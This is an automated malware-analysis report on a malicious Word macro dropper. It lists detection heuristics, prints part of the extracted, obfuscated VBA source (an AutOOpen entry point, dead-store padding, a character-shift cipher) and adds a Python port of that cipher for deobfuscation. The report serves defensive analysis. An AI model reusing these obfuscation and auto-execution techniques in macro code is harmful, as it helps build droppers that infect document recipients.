Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The sample is a malicious OLE Word document carrying VBA macros, and the document body contains a lure instructing the user to enable macros, the standard way droppers get past Office macro security settings. The auto-executing entry point is `Sub AutOOpen()`; VBA identifiers are case-insensitive, so the odd capitalisation does not stop Word from treating it as AutoOpen, while it does defeat naive case-sensitive string matching. The recovered source is heavily padded with dead arithmetic on a variable that is never read (`suzuki100`), and its real strings are assembled at run time: `nymphroa` looks a character up in a 90-entry table (`ninvaude`, which reads `pedanaeb.ruxcontrol`, an object property not defined in any extracted module and therefore most likely stored in a UserForm control) and shifts its position with wrap-around, a simple substitution cipher. The CreateObject and CallByName calls flagged below, together with ClamAV's Dropper signature and the shell/download tokens found in the compiled p-code, point to a downloader that fetches and runs a second-stage payload, although no payload URL was recoverable from the macro source alone.
Heuristics (9)

- ClamAV: Doc.Dropper.Agent-6581558-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware, signature Doc.Dropper.Agent-6581558-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): an auto-executing AutoOpen entry point is present, spelled `AutOOpen` in this sample; VBA identifiers are case-insensitive, so Word still runs it when the document is opened.
- CreateObject call (high, OLE_VBA_CREATEOBJ): the macro calls CreateObject, which instantiates arbitrary COM objects at run time.
- CallByName call (high, OLE_VBA_CALLBYNAME): the macro calls CallByName, which invokes a method or property by its string name and so keeps the called member out of the visible identifier list.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that its "no modern VBA project was recovered" condition conflicts with the VBA source olevba extracted from this same sample (see Extracted artifacts), so weight this finding accordingly.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): the document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier, not a network indicator; no other URL was recovered by static extraction.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9312 bytes | c3f100af113f914a265279db3855c6f2c8e96a8d5d075b72d08f7b942347cb64 |
Preview (first 1,000 lines of the extracted script; the listing is truncated on this page)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
domino1964
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
End Sub
Attribute VB_Name = "ACCEPTED"
Function accessruy()
accessruy = nake3344
End Function
Function nake3344()
nake3344 = guest1974(xytroftu.buggerme)
End Function
Function crack_serial()
crack_serial = xytroftu.waswas
End Function
Function luctynbu()
luctynbu = gogoose1.xaza1111
End Function
Function chicojosie(cleissin, wambapvo)
linksenior = Left(cleissin, wambapvo)
chicojosie = legendagp(linksenior)
End Function
Function legendagp(plankpin)
legendagp = Right(plankpin, 1)
End Function
Function portroas()
portroas = "/usgc;]x]/lEmaQR/aE.]/"
End Function
Attribute VB_Name = "aveidlegiB"
Function nymphroa(servroor As String, NZIsxFonq As Integer) As String
Dim Gjyznysq As Integer
Gjyznysq = 0
suzuki100 = 17 + 43
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
For botanistbotanist = 1 To 90
If (chicojosie(ninvaude, botanistbotanist) = servroor) Then
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
Gjyznysq = botanistbotanist
Exit For
End If
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
Next botanistbotanist
Gjyznysq = IIf(Gjyznysq - NZIsxFonq <= 0, 90 + Gjyznysq - NZIsxFonq, Gjyznysq - NZIsxFonq)
nymphroa = chicojosie(ninvaude, Gjyznysq)
End Function
Function liophia5()
liophia5 = pedanaeb.AVEEKERUHC
End Function
Function mygodfen(vonabloT, AVONUBED, cfmrnb69, jaxmeoff)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
gogoose1.tralcodg = lawstorm(vonabloT, AVONUBED) + cassie169(vonabloT, cfmrnb69) + anesabya(jaxmeoff)
End Function
Sub domino1964()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
pedanaeb.vanomerd = "ourlomeb"
End Sub
Attribute VB_Name = "Flawacid"
Function sublessee(mrjrb827, fooldelta)
sublessee = ationdri(Int((mrjrb827 * churedro()) + fooldelta))
End Function
Function ationdri(anyzrata)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
ationdri = CInt(anyzrata)
End Function
Function lawstorm(chenabcd, ajaxdude)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
lawstorm = guest1974(gogoose1.cancerfrog) + chenabcd + guest1974(tiggerisp.kinsscri) + _
ajaxdude + guest1974(gogoose1.gogueacr + gogoose1.signtist) + ajaxdude
End Function
Function anesabya(attilapat)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
anesabya = guest1974(portroas + xytroftu.BBCFKUJC) + attilapat + _
guest1974(xytroftu.AVOKNELOBE) + attilapat + guest1974(pedanaeb.moczeegi)
End Function
Function ninvaude()
ninvaude = pedanaeb.ruxcontrol
End Function
Attribute VB_Name = "gogoos
```

... (truncated)
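The visible modules show two obfuscation layers worth stripping before reading the code: dead-store padding (`suzuki100 = ...`, assigned everywhere and never read) and a character-table shift cipher (`nymphroa`, built on `chicojosie`, which is `Right(Left(s, n), 1)`, the n-th character of a string). The Python below is an added example, not part of the report or of the sample: it ports `nymphroa` and its helper faithfully, including the behaviour for characters absent from the table, adds the inverse transform for round-trip testing, and removes the padding lines. The 90-character table is constructed here because the real one is read from `pedanaeb.ruxcontrol` (via `ninvaude`), which the extraction did not recover; the encoded string `"/usgc;]x]/lEmaQR/aE.]/"` returned by `portroas` can only be decoded once that table and the shift argument passed by its caller are pulled from the document.

```python
import re
import string

TABLE_LEN = 90  # nymphroa loops For ... = 1 To 90: a 90-entry character table

# Constructed stand-in for the real table. In the sample it is read from
# pedanaeb.ruxcontrol (via ninvaude), which the extraction did not recover,
# so the real value is unknown; any 90 distinct characters exercise the logic.
DEMO_TABLE = (string.ascii_letters + string.digits + string.punctuation)[:TABLE_LEN]

# Dead-store padding: suzuki100 is assigned all over the sample and never read.
PADDING_RE = re.compile(r"^\s*suzuki100\s*=")


def strip_padding(vba_src: str) -> str:
    """Drop the 'suzuki100 = ...' lines so the real control flow is readable."""
    return "\n".join(l for l in vba_src.splitlines() if not PADDING_RE.match(l))


def chicojosie(table: str, n: int) -> str:
    """Port of chicojosie/legendagp = Right(Left(table, n), 1): the n-th
    character, 1-based. Left() clamps at the string length, and n = 0 gives ''."""
    return table[:n][-1:] if n > 0 else ""


def nymphroa(table: str, ch: str, shift: int) -> str:
    """Port of nymphroa(): 1-based position of ch in the table (0 if absent),
    moved back by `shift` with wrap-around into 1..90, then looked up again.
    A character missing from the table therefore maps to one fixed entry."""
    if len(table) != TABLE_LEN:
        raise ValueError("table must have exactly 90 entries")
    pos = 0
    for i in range(1, TABLE_LEN + 1):
        if chicojosie(table, i) == ch:
            pos = i
            break
    pos = TABLE_LEN + pos - shift if pos - shift <= 0 else pos - shift
    return chicojosie(table, pos)


def decode(table: str, text: str, shift: int) -> str:
    """Apply nymphroa character by character, as the sample's callers would."""
    return "".join(nymphroa(table, c, shift) for c in text)


def encode(table: str, text: str, shift: int) -> str:
    """Inverse of decode (my addition for testing; the sample has no encoder)."""
    out = []
    for c in text:
        pos = table.index(c) + 1 + shift
        out.append(table[(pos - 1) % TABLE_LEN])
    return "".join(out)


# Excerpt from the sample's recovered source, used to show padding removal.
AUTOOPEN_SRC = """Sub AutOOpen()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
domino1964
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
End Sub"""

if __name__ == "__main__":
    print(strip_padding(AUTOOPEN_SRC))
    secret = "http://x.y/z"  # constructed plaintext, not from the sample
    ct = encode(DEMO_TABLE, secret, 17)
    print(ct, "->", decode(DEMO_TABLE, ct, 17))
```

Once `pedanaeb.ruxcontrol` has been read out of the document (for example from the UserForm stream, if that is where it lives), replace `DEMO_TABLE` with it and call `decode` on `portroas()` with the shift used by the caller; with the table from the document the same code recovers the strings the macro builds at run time.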